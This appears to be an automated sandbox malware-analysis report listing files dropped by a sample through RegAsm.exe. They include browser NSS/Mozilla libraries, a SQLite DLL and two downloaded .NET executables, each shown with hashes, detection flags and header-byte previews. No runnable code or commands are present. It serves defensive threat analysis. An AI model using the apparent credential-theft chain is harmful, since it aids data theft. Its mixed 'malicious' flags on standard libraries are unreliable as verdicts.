                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: Z66MsXpleT.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: eSLlhErJ0q.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\mozglue.dll

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):608080
                                                      Entropy (8bit):6.833616094889818
                                                      Encrypted:false
                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\msvcp140.dll

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):450024
                                                      Entropy (8bit):6.673992339875127
                                                      Encrypted:false
                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\nss3.dll

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2046288
                                                      Entropy (8bit):6.787733948558952
                                                      Encrypted:false
                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\softokn3.dll

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):257872
                                                      Entropy (8bit):6.727482641240852
                                                      Encrypted:false
                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\vcruntime140.dll

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):80880
                                                      Entropy (8bit):6.920480786566406
                                                      Encrypted:false
                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\KJKJJJECFI.exe.log

                                                      Download File
                                                      Process:C:\ProgramData\KJKJJJECFI.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):42
                                                      Entropy (8bit):4.0050635535766075
                                                      Encrypted:false
                                                      SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                      MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                      SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                      SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                      SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\KKJEBAAECB.exe.log

                                                      Download File
                                                      Process:C:\ProgramData\KKJEBAAECB.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):42
                                                      Entropy (8bit):4.0050635535766075
                                                      Encrypted:false
                                                      SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                      MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                      SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                      SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                      SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):42
                                                      Entropy (8bit):4.0050635535766075
                                                      Encrypted:false
                                                      SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                      MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                      SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                      SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                      SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                      Malicious:true
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd8fb6f7b_lgjfd[1].exe

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):328744
                                                      Entropy (8bit):7.984051528678991
                                                      Encrypted:false
                                                      SSDEEP:6144:zKKOAlrAtx7WiWOdkUsn18kq1viAXMFTd7r9pq8CG6UKBqdx7EO:zKLYUtcrOs1yeFRPzbCGQYx7EO
                                                      MD5:087F21847D13D50158683C834471728C
                                                      SHA1:6E0CAF480014EB6239CBE757F9A75E4B5594AE69
                                                      SHA-256:353871B38BB73FFB940B773C92849796C4C71949D5FFC9EA55103A8F41DABB74
                                                      SHA-512:10B6BD132E219FCE9F5AE27B648305E412BBD64FBFABB1C67E99B30CE088914DB0B2D1750861362F28EE6E0FE2301B35878F22D06DE7FC3CF177A4216FBF3DB6
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. .......................@............`.................................X...S.......................(&... ...... ................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......x...............................................................S..a.....c?.6..U.CMf'.<.s.oo..<C.q.wN.e..i...e4+...........R..1br...IUU<.N...|c.VGH...$.&~.+....<38....tR]B.z.4-oC.{......{9...x0w.I7._.;!'q..U...?.`../.+,P.M......8..}.3j.$.Y=2...).W.].t*Z.>..g2.i-.....I..[.w.....u..........h..a.3.Q*....y.......=c2..n......Q.J>...=.f..w..E-`..../.....'.........g.........$.1sW...........l.....S..>.a.....g.h..zK......._oB3%.c.Z.)V.gg.._..0...;<f..

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd9a65b5d_vqwergf[1].exe

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):196648
                                                      Entropy (8bit):7.963093250945942
                                                      Encrypted:false
                                                      SSDEEP:6144:HQOkLP/rabJ2k24h3ErKsHJHOwiZ8byukEO:JcP/rFkLqrKQJEueukEO
                                                      MD5:70567FAE269796BF407322D0A4435054
                                                      SHA1:E11EDDF4F0CE6D5288D8187005D34EEE6EFBA046
                                                      SHA-256:5923793C30ACF9026A872FCB8CE04A671FA194BB4F73EEF165D687AE97683047
                                                      SHA-512:8C52339E85B8827FA25C1FB64FA47CA6DE25F40D6F66B5D426A276E93D10751537F03C41E144CA22A6C34D10A896EBD7A8070846984F783E293BF4B8B2A58617
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. .......................@......N,....`.................................X...S.......................(&... ...... ................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......x...............................................................R&(.,X..U.f.h..&\...=E.....%"=m?*<...U..Hf.t$......U!.B.#..:..d..E...\..J1..9.......K.lX.GRA..6|^...o....@.&..5........:....i .Xm..Xj...._0"L.X.EO j..%..mn.EcT%.3C.))..^.:.Tn7.w..Y....`[A.ty...N....j...s.|QT?.9..'.:.l.$.{&V..}.9..nes..[...?.wqR/_JU.8.ir_R...h..y<.<..@/......'...-U..v8.F.2z..U'..q..5,....+..GE..?@..@!........?.Yy.2.....Yq._..vd[.....D....VR.Q..<..P.[.b.#_.D.../...6.Y....

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):450024
                                                      Entropy (8bit):6.673992339875127
                                                      Encrypted:false
                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):685392
                                                      Entropy (8bit):6.872871740790978
                                                      Encrypted:false
                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):80880
                                                      Entropy (8bit):6.920480786566406
                                                      Encrypted:false
                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):608080
                                                      Entropy (8bit):6.833616094889818
                                                      Encrypted:false
                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2046288
                                                      Entropy (8bit):6.787733948558952
                                                      Encrypted:false
                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):257872
                                                      Entropy (8bit):6.727482641240852
                                                      Encrypted:false
                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2459136
                                                      Entropy (8bit):6.052474106868353
                                                      Encrypted:false
                                                      SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                      MD5:90E744829865D57082A7F452EDC90DE5
                                                      SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                      SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                      SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\delays.tmp

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):1048575
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:Ehp:Wp
                                                      MD5:FBF27F9317DC1176120307BB038058D4
                                                      SHA1:D2D7E774D5708413233C6A443DDBDBC7342BC8FC
                                                      SHA-256:1DD5F819C51102C605936DB6074109F74FA293DE9C45FF3570F3E3BE5A880172
                                                      SHA-512:118C941E53ABC047EB1328D28D960A28CE096BBFE4CCF4923A04850AAC69F53475F0040F86BA1E94EAC5FE1D9F04538BB9F4DC48C7D1D1B46FC836862325F1BC
                                                      Malicious:false
                                                      Preview:wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):1835008
                                                      Entropy (8bit):4.466318524081416
                                                      Encrypted:false
                                                      SSDEEP:6144:uIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNmdwBCswSb+:jXD94zWlLZMM6YFH8++
                                                      MD5:5911C8EBDBBC2016DCB80F185C29A0EE
                                                      SHA1:DC1BB489B175990634325DBA7B2361E10BB1E09D
                                                      SHA-256:CF69D0A1A06B82E2B61F03700FD1DA1A5A332A467035AA897A2F0C09A7057C31
                                                      SHA-512:DC4118C0B03DEF4D1186B8575E7D017FED3A701F854397FD247637895070F3E3DBBB4748CFAA22B9BE12D6095435789101DAA85B450AC9004A16C871AD7F846C
                                                      Malicious:false
